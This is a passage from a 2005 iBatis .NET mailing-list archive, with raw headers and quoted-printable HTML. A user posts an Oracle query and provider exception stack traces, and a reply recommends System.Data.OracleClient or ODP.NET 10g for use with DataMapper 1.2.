&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;isNotNull prepend=3D&quot;AND&quot; property=3D&quot;LOGIN&quot;&gt;<br>&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LOGIN like #LOGIN#<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&lt;/isNotNull&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&lt;isGreaterThan prepend=3D&quot;AND&quot; property=3D&quot;ACTIVE&quot; compareValue=3D&quo= t;-1&quot;&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ACTIVE =3D #ACTIVE#<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&lt;/isGreaterThan&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/dynamic&gt;<b= r>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/select&gt;<br><br>wi= th<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;add key=3D&quot;p= rovider&quot; value=3D&quot;oracle10.1&quot; /&gt;<br>i get <br><br>[OracleTypeException: Numerische Stellenangabe liegt au=DFerhalb de= s g=FCltigen Bereiches (1 - 38)]<br>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAcce= ss.Types.OracleDecimal.ConvertToPrecScale(OracleDecimal value1, Int32 preci= sion, Int32 scale) +667 <br>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.OracleParameter.PreBin= d_Decimal() +3956<br>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.Oracl= eParameter.PreBind(OracleConnection conn, IntPtr errCtx, Int32 arraySize) += 132<br>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.OracleCommand.Execu= teReader (Boolean requery, Boolean fillRequest, CommandBehavior behavior)<br>+2349<b= r>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.OracleCommand.ExecuteRea= der(Boolean requery, Boolean fillRequest, CommandBehavior behavior) +0<br>&= nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.OracleCommand.System.Data.I= DbCommand.ExecuteReader () +81<br>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.OracleCommand.Sy= stem.Data.IDbCommand.ExecuteReader() +0<br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNe= t.DataMapper.MappedStatements.MappedStatement.RunQueryForList(RequestScope = request, IDalSession session,<br>Object parameterObject, Int32 skipResults,= Int32 maxResults, RowDelegate rowDelegate) <br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.MappedStatements.MappedSta= tement.ExecuteQueryForList(IDalSession session, Object<br>parameterObject, = Int32 skipResults, Int32 maxResults)<br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.D= ataMapper.MappedStatements.MappedStatement.ExecuteQueryForList (IDalSession session, Object parameterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;IB= atisNet.DataMapper.SqlMapper.QueryForList(String statementName, Object para= meterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;MMServer.DAL.USERSDB.SelectFilter(U= SERSDB_Filter filter) in<br>e:\projekteweb\lft\medienmanager\mmserver\app_c= ode\dal\man\usersdb.cs:103 <br>&nbsp;&nbsp;&nbsp;&nbsp;MMServer.Pages.ifPlayListen.Page_Load(Object se= nder, EventArgs e) in<br>e:\projekteweb\lft\medienmanager\mmserver\app_code= \pages\playlisten\ifplaylisten.aspx.cs:41<br><br><br>with<br>&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;add key=3D&quot;provider&quot; value= =3D&quot; oracleClient1.0&quot; /&gt;<br><br>i get<br><br>[Exception: Parameter 'para= m0': No size set for variable length data type: String.]<br>&nbsp;&nbsp;&nb= sp;&nbsp;System.Data.OracleClient.OracleParameterBinding.PrepareForBind(Ora= cleConnection connection, Int32&amp; offset) +720 <br>&nbsp;&nbsp;&nbsp;&nbsp;System.Data.OracleClient.OracleCommand.Execute(= OciHandle statementHandle, CommandBehavior behavior, Boolean<br>isReader, B= oolean needRowid, OciHandle&amp; rowidDescriptor, ArrayList&amp; refCursorP= arameterOrdinals) +1919 <br>&nbsp;&nbsp;&nbsp;&nbsp;System.Data.OracleClient.OracleCommand.Execute(= OciHandle statementHandle, CommandBehavior behavior, ArrayList&amp;<br>refC= ursorParameterOrdinals) +28<br>&nbsp;&nbsp;&nbsp;&nbsp;System.Data.OracleCl= ient.OracleCommand.ExecuteReader(CommandBehavior behavior) +272 <br>&nbsp;&nbsp;&nbsp;&nbsp;System.Data.OracleClient.OracleCommand.ExecuteR= eader() +7<br>&nbsp;&nbsp;&nbsp;&nbsp;System.Data.OracleClient.OracleComman= d.System.Data.IDbCommand.ExecuteReader() +5<br>&nbsp;&nbsp;&nbsp;&nbsp;IBat= isNet.DataMapper.MappedStatements.MappedStatement.RunQueryForList (RequestScope request, IDalSession session,<br>Object parameterObject, Int3= 2 skipResults, Int32 maxResults, RowDelegate rowDelegate)<br>&nbsp;&nbsp;&n= bsp;&nbsp;IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQuer= yForList(IDalSession session, Object <br>parameterObject, Int32 skipResults, Int32 maxResults)<br>&nbsp;&nbsp;&n= bsp;&nbsp;IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQuer= yForList(IDalSession session, Object parameterObject)<br>&nbsp;&nbsp;&nbsp;= &nbsp;IBatisNet.DataMapper.SqlMapper.QueryForList (String statementName, Object parameterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;M= MServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in<br>e:\projektewe= b\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103<br>&nbsp;&nbsp= ;&nbsp;&nbsp;MMServer.Pages.ifPlayListen.Page_Load (Object sender, EventArgs e) in<br>e:\projekteweb\lft\medienmanager\mmserve= r\app_code\pages\playlisten\ifplaylisten.aspx.cs:43<br><br><br><br><br>If i= change the condition to<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&lt;isNotEqual prepend=3D&quot;AND&quot; property=3D&quot;LOGIN&quot; compareValue=3D&quot= ;&quot;&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LOGIN like #LOGIN#<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&lt;/isNotEqual&gt;<br><br>i get<br><br>[DataMapperException: Err= or comparing in conditional fragment.&nbsp;&nbsp;Uknown 'compare to' values= .]<br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynami= c.Handlers.ConditionalTagHandler.Compare (SqlTagContext ctx, SqlTag<br>sqlTag, Object parameterObject)<br>&nbsp;&nbs= p;&nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsEqu= alTagHandler.IsCondition(SqlTagContext ctx, SqlTag tag,<br>Object parameter= Object)<br>&nbsp;&nbsp;&nbsp;&nbsp; IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsNotEqualTagHandle= r.IsCondition (SqlTagContext ctx, SqlTag<br>tag, Object parameterObject)<br>&nbsp;&nbsp;&= nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.Conditio= nalTagHandler.DoStartFragment(SqlTagContext ctx,<br>SqlTag tag, Object para= meterObject)<br> &nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynamic.Dyna= micSql.ProcessBodyChildren(RequestScope request, SqlTagContext<br>ctx, Obje= ct parameterObject, IEnumerator localChildren, StringBuilder buffer)<br>&nb= sp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynamic.Dynamic= Sql.ProcessBodyChildren (RequestScope request, SqlTagContext<br>ctx, Object parameterObject, IEnume= rator localChildren, StringBuilder buffer)<br>&nbsp;&nbsp;&nbsp;&nbsp;IBati= sNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChildren(Re= questScope request, SqlTagContext <br>ctx, Object parameterObject, IList localChildren)<br>&nbsp;&nbsp;&nbsp;= &nbsp;IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.Process(Req= uestScope request, Object parameterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;IBati= sNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.GetRequestScope (Object parameterObject, IDalSession session)<br>&nbsp;&nbsp;&nbsp;&nbsp;IB= atisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDa= lSession session, Object<br>parameterObject, Int32 skipResults, Int32 maxRe= sults)<br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNet.DataMapper.MappedStatements.Map= pedStatement.ExecuteQueryForList (IDalSession session, Object parameterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;IB= atisNet.DataMapper.SqlMapper.QueryForList(String statementName, Object para= meterObject)<br>&nbsp;&nbsp;&nbsp;&nbsp;MMServer.DAL.USERSDB.SelectFilter(U= SERSDB_Filter filter) in<br>e:\projekteweb\lft\medienmanager\mmserver\app_c= ode\dal\man\usersdb.cs:103 <br>&nbsp;&nbsp;&nbsp;&nbsp;MMServer.Pages.ifPlayListen.Page_Load(Object se= nder, EventArgs e) in<br>e:\projekteweb\lft\medienmanager\mmserver\app_code= \pages\playlisten\ifplaylisten.aspx.cs:43<br><br><br><br><br>&gt; too encou= ntered some early on, specifically with respect to default type <br>&gt; conversion of certain sizes of oracle number fields, and might be = able<br>&gt; to point you in the right direction.<br>&gt;<br>&gt; Jeremy Gr= ay<br><br><br>&lt;snip&gt;<br><br>&gt; I like to ask:<br>&gt;<br>&gt; Which= seems to be the best Oracle provider to work with the ibatis <br>&gt; DataMapper 1.2 ( latest SVN version ) ?<br>&gt;<br>&gt; Background= : I get different TypeExceptions on different columntypes on<br>&gt; differ= ent providers.<br><br>--<br><br>Kind regards<br><br>Uwe<br>Lesta at SBS-Sof= twaresysteme.de <br><br><br></blockquote></div><br> </span></div></blockquote></div><br> ------=_Part_2689_7051199.1133548610001-- From [email protected] Sat Dec 03 00:00:54 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14266 invoked from network); 3 Dec 2005 00:00:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Dec 2005 00:00:54 -0000 Received: (qmail 3538 invoked by uid 500); 2 Dec 2005 23:59:41 -0000 Delivered-To: [email protected] Received: (qmail 3357 invoked by uid 500); 2 Dec 2005 23:59:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3026 invoked by uid 99); 2 Dec 2005 23:59:39 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Dec 2005 15:59:38 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Dec 2005 10:36:39 -0800 Received: by wproxy.gmail.com with SMTP id 50so147682wri for <[email protected]>; Fri, 02 Dec 2005 10:34:48 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=WV46es7jSEORX5FDNOXGfsPhVnc5qeLLP5CaZuXwKVqTchBQzbWwyhmqyes54AW/wBAPZ67dgaOTzYg2Qvw+XaGsqsNPBV9Z5TOKZuGVqMxiuLIUEaPlHjY0os+Ul5eI19l2AQHu+8W/oirrkHTRKotBpiGVmZZfKxQsZgFkgmU= Received: by 161.129.204.104 with SMTP id y17mr688856wra; Fri, 02 Dec 2005 10:34:48 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 2 Dec 2005 10:34:47 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 2 Dec 2005 13:34:47 -0500 From: Roberto R <[email protected]> To: [email protected] Subject: Re: Oracle provider with iBatis dataMapper 1.2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_2633_17494571.1133548487937" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_2633_17494571.1133548487937 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Tests were run for System.Data.OracleClient, ODP.NET 9i, and ODP.NET 10g. (I would not recommend using ODP.NET 9i with the DataMapper.) >From my experience, System.Data.OracleClient was the "easiest" to use right away, but ODP.NET 10g offers some advanced features that could be used outside of the DataMapper. Roberto On 12/2/05, Uwe Lesta <[email protected]> wrote: > > > Befor i dig into some solution i like to ask my question with other words= : > > Which Oracle provider is best tested and is advised by the iBatis comunet= y > ? > > > Jeremy Gray wrote: > > > Can you provide any details regarding the exceptions you are seeing? We > > sure > > my test query is : > > <select id=3D"SelectFilter" parameterClass=3D" > MMServer.DAL.USERSDB_Filter" resultMap=3D"USERSSelectResult" > > SELECT > ID, LOGIN, FIRSTNAME, LASTNAME, ROLE_ID, ORG_ID, > REMARK, EXPIRES, MODIFIED, DISABLED, ACTIVE > FROM USERS > <dynamic prepend=3D"WHERE"> > <isNotNull prepend=3D"AND" property=3D"LOGIN"> > LOGIN like #LOGIN# > </isNotNull> > <isGreaterThan prepend=3D"AND" property=3D"ACTIVE= " > compareValue=3D"-1"> > ACTIVE =3D #ACTIVE# > </isGreaterThan> > </dynamic> > </select> > > with > <add key=3D"provider" value=3D"oracle10.1" /> > i get > > [OracleTypeException: Numerische Stellenangabe liegt au=DFerhalb des > g=FCltigen Bereiches (1 - 38)] > Oracle.DataAccess.Types.OracleDecimal.ConvertToPrecScale(OracleDecima= l > value1, Int32 precision, Int32 scale) +667 > Oracle.DataAccess.Client.OracleParameter.PreBind_Decimal() +3956 > Oracle.DataAccess.Client.OracleParameter.PreBind(OracleConnection > conn, IntPtr errCtx, Int32 arraySize) +132 > Oracle.DataAccess.Client.OracleCommand.ExecuteReader(Boolean requery, > Boolean fillRequest, CommandBehavior behavior) > +2349 > Oracle.DataAccess.Client.OracleCommand.ExecuteReader(Boolean requery, > Boolean fillRequest, CommandBehavior behavior) +0 > > Oracle.DataAccess.Client.OracleCommand.System.Data.IDbCommand.ExecuteRead= er() > +81 > > Oracle.DataAccess.Client.OracleCommand.System.Data.IDbCommand.ExecuteRead= er() > +0 > IBatisNet.DataMapper.MappedStatements.MappedStatement.RunQueryForList= (RequestScope > request, IDalSession session, > Object parameterObject, Int32 skipResults, Int32 maxResults, RowDelegate > rowDelegate) > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList= (IDalSession > session, Object > parameterObject, Int32 skipResults, Int32 maxResults) > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList= (IDalSession > session, Object parameterObject) > IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, > Object parameterObject) > MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in > e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103 > MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) in > > e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifpla= ylisten.aspx.cs:41 > > > with > <add key=3D"provider" value=3D"oracleClient1.0" /> > > i get > > [Exception: Parameter 'param0': No size set for variable length data type= : > String.] > System.Data.OracleClient.OracleParameterBinding.PrepareForBind(Oracle= Connection > connection, Int32& offset) +720 > System.Data.OracleClient.OracleCommand.Execute(OciHandle > statementHandle, CommandBehavior behavior, Boolean > isReader, Boolean needRowid, OciHandle& rowidDescriptor, ArrayList& > refCursorParameterOrdinals) +1919 > System.Data.OracleClient.OracleCommand.Execute(OciHandle > statementHandle, CommandBehavior behavior, ArrayList& > refCursorParameterOrdinals) +28 > System.Data.OracleClient.OracleCommand.ExecuteReader(CommandBehavior > behavior) +272 > System.Data.OracleClient.OracleCommand.ExecuteReader() +7 > > System.Data.OracleClient.OracleCommand.System.Data.IDbCommand.ExecuteRead= er() > +5 > IBatisNet.DataMapper.MappedStatements.MappedStatement.RunQueryForList= (RequestScope > request, IDalSession session, > Object parameterObject, Int32 skipResults, Int32 maxResults, RowDelegate > rowDelegate) > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList= (IDalSession > session, Object > parameterObject, Int32 skipResults, Int32 maxResults) > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList= (IDalSession > session, Object parameterObject) > IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, > Object parameterObject) > MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in > e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103 > MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) in > > e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifpla= ylisten.aspx.cs:43 > > > > > If i change the condition to > > <isNotEqual prepend=3D"AND" property=3D"LOGIN" > compareValue=3D""> > LOGIN like #LOGIN# > </isNotEqual> > > i get > > [DataMapperException: Error comparing in conditional fragment. Uknown > 'compare to' values.] > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.ConditionalTagHan= dler.Compare(SqlTagContext > ctx, SqlTag > sqlTag, Object parameterObject) > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsEqualTagHandler= .IsCondition(SqlTagContext > ctx, SqlTag tag, > Object parameterObject) > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsNotEqualTagHand= ler.IsCondition(SqlTagContext > ctx, SqlTag > tag, Object parameterObject) > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.ConditionalTagHan= dler.DoStartFragment(SqlTagContext > ctx, > SqlTag tag, Object parameterObject) > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChil= dren(RequestScope > request, SqlTagContext > ctx, Object parameterObject, IEnumerator localChildren, StringBuilder > buffer) > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChil= dren(RequestScope > request, SqlTagContext > ctx, Object parameterObject, IEnumerator localChildren, StringBuilder > buffer) > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChil= dren(RequestScope > request, SqlTagContext > ctx, Object parameterObject, IList localChildren) > IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.Process(Req= uestScope > request, Object parameterObject) > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.GetRequestScope= (Object > parameterObject, IDalSession session) > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList= (IDalSession > session, Object > parameterObject, Int32 skipResults, Int32 maxResults) > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList= (IDalSession > session, Object parameterObject) > IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, > Object parameterObject) > MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in > e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103 > MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) in > > e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifpla= ylisten.aspx.cs:43 > > > > > > too encountered some early on, specifically with respect to default typ= e > > conversion of certain sizes of oracle number fields, and might be able > > to point you in the right direction. > > > > Jeremy Gray > > > <snip> > > > I like to ask: > > > > Which seems to be the best Oracle provider to work with the ibatis > > DataMapper 1.2 ( latest SVN version ) ? > > > > Background: I get different TypeExceptions on different columntypes on > > different providers. > > -- > > Kind regards > > Uwe > [email protected] > > > ------=_Part_2633_17494571.1133548487937 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Tests were run for System.Data.OracleClient, <a href=3D"http://ODP.NET">ODP= .NET</a> 9i, and <a href=3D"http://ODP.NET">ODP.NET</a> 10g.&nbsp; (I would not recommend using <a href=3D"http://ODP.NET">ODP.NET<= /a> 9i with the DataMapper.)<br> <br> >From my experience, System.Data.OracleClient was the &quot;easiest&quot; to= use right away, but <a href=3D"http://ODP.NET">ODP.NET</a> 10g offers some adva= nced features that could be used outside of the DataMapper.&nbsp; <br> <br> Roberto<br> <br><br><div><span class=3D"gmail_quote">On 12/2/05, <b class=3D"gmail_send= ername">Uwe Lesta</b> &lt;<a href=3D"mailto:[email protected]">l= [email protected]</a>&gt; wrote:</span><blockquote class=3D"gmail= _quote" style=3D"border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt= 0pt 0.8ex; padding-left: 1ex;"> <br>Befor i dig into some solution i like to ask my question with other wor= ds:<br><br>Which Oracle provider is best tested and is advised by the iBati= s comunety ?<br><br><br>Jeremy Gray wrote:<br><br>&gt; Can you provide any = details regarding the exceptions you are seeing? We <br><br>sure<br><br>my test query is :<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&nbsp;&nbsp;&nbsp;&lt;select id=3D&quot;SelectFilter&quot; parameterClass=3D&quot;MMServer.DAL.USERSDB_F= ilter&quot; resultMap=3D&quot;USERSSelectResult&quot; &gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SELE= CT<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= ID, LOGIN, FIRSTNAME, LASTNAME, ROLE_ID, ORG_ID, REMARK, EXPIRES, MODIFIED, DISABLED, ACTIVE<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FROM USERS<br>&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&lt;dynamic prepend=3D&quot;WHERE&quot;&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;isNotNull prepend=3D&quot;AND&quot; property=3D&quot;LOGIN&quot;&gt;<br>&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LOGIN like #LOGIN#<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&lt;/isNotNull&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs= p;&nbsp;&nbsp;&nbsp;&nbsp;&lt;isGreaterThan prepend=3D&quot;AND&quot; property=3D&quot;ACTIVE&quot; compareValue=3D&quo= t;-1&quot;&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ACTIVE =3D #ACTIVE#<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&lt;/isGreaterThan&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/dynamic&gt;<b= r>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/select&gt;<br><br>wi= th<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;add key=3D&quot;p= rovider&quot; value=3D&quot;oracle10.1&quot; /&gt;<br>i get <br><br>[OracleTypeException: Numerische Stellenangabe liegt au=DFerhalb de= s g=FCltigen Bereiches (1 - 38)]<br>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAcce= ss.Types.OracleDecimal.ConvertToPrecScale(OracleDecimal value1, Int32 preci= sion, Int32 scale) +667 <br>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.OracleParameter.PreBin= d_Decimal() +3956<br>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.Oracl= eParameter.PreBind(OracleConnection conn, IntPtr errCtx, Int32 arraySize) += 132<br>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.OracleCommand.Execu= teReader (Boolean requery, Boolean fillRequest, CommandBehavior behavior)<br>+2349<b= r>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.OracleCommand.ExecuteRea= der(Boolean requery, Boolean fillRequest, CommandBehavior behavior) +0<br>&= nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.OracleCommand.System.Data.I= DbCommand.ExecuteReader () +81<br>&nbsp;&nbsp;&nbsp;&nbsp;Oracle.DataAccess.Client.OracleCommand.Sy= stem.Data.IDbCommand.ExecuteReader() +0<br>&nbsp;&nbsp;&nbsp;&nbsp;IBatisNe= t.DataMapper.MappedStatements.MappedStatement.RunQueryForList(RequestScope = request, IDalSession session,<br>Object parameterObject, Int32 skipResults,= Int32 maxResults, RowDelegate rowDelegate) 